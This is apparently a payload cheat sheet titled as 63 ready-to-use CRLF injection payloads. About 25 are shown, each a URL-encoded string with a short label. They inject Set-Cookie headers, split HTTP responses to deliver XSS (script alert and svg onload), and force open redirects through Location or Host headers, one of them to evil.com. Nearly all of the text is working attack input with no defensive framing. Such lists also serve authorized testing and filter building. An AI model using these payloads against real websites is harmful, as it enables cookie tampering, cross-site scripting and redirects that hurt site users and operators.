CRLF
63 ready-to-use payloads
/%%0a0aSet-Cookie:crlf=injection
  CRLF → inject arbitrary Set-Cookie header
/%0aSet-Cookie:coffin=hi;
  CRLF → inject arbitrary Set-Cookie header
/%0aSet-Cookie:crlf=injection
  CRLF → inject arbitrary Set-Cookie header
/%0d%0a%0d%0a<script>alert('XSS')</script>;
  CRLF → inject XSS payload via response splitting
/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e
  CRLF → HTTP response splitting + XSS injection
/%0d%0aContent-Type:%20text%2fhtml%0d%0aHTTP%2f1.1%20200%20OK%0d%0aContent-Type:%20text%2fhtml%0d%0a%0d%0a%3Cscript%3Ealert('XSS');%3C%2fscript%3E
  CRLF → HTTP response splitting + XSS injection
%0d%0aHost:%20{{Hostname}}%0d%0aCookie:%20coffin=hi%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aSet-Cookie:%20coffin=hi%0d%0a%0d%0a
  CRLF → inject arbitrary Set-Cookie header
/%0d%0ahost:%20www.google.com
  CRLF → inject Location header (open redirect)
/%0d%0ahost:%20www.google.com%0d%0a
  CRLF → inject Location header (open redirect)
/%0d%0aLocation:%20http://evil.com
  CRLF → inject Location header (open redirect)
/%0d%0aLocation:www.google.com%0d%0a
  CRLF → inject Location header (open redirect)
/%0d%0aSet-Cookie:coffin=hi;
  CRLF → inject arbitrary Set-Cookie header
/%0d%0aSet-Cookie:crlf=injection
  CRLF → inject arbitrary Set-Cookie header
/%0dSet-Cookie:coffin=hi;
  CRLF → inject arbitrary Set-Cookie header
/%0dSet-Cookie:crlf=injection
  CRLF → inject arbitrary Set-Cookie header
%23%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a<svg/onload%3dalert%28document.domain%29>
  CRLF → HTTP response splitting + XSS injection
/%23%0aSet-Cookie:crlf=injection
  CRLF → inject arbitrary Set-Cookie header
/%23%0D%0ALocation:www.google.com;
  CRLF → inject Location header (open redirect)
/%23%0d%0aSet-Cookie:crlf=injection
  CRLF → inject arbitrary Set-Cookie header
/%23%0dSet-Cookie:crlf=injection
  CRLF → inject arbitrary Set-Cookie header
/%250aSet-Cookie:crlf=injection
  CRLF → inject arbitrary Set-Cookie header
/%25250aSet-Cookie:crlf=injection
  CRLF → inject arbitrary Set-Cookie header
/%25%30%61Set-Cookie:crlf=injection
  CRLF → inject arbitrary Set-Cookie header
/%25%30aSet-Cookie:crlf=injection
  CRLF → inject arbitrary Set-Cookie header
/%2e%2e%2f%0d%0aSet-Cookie:crlf=injection
  CRLF → inject arbitrary Set-Cookie header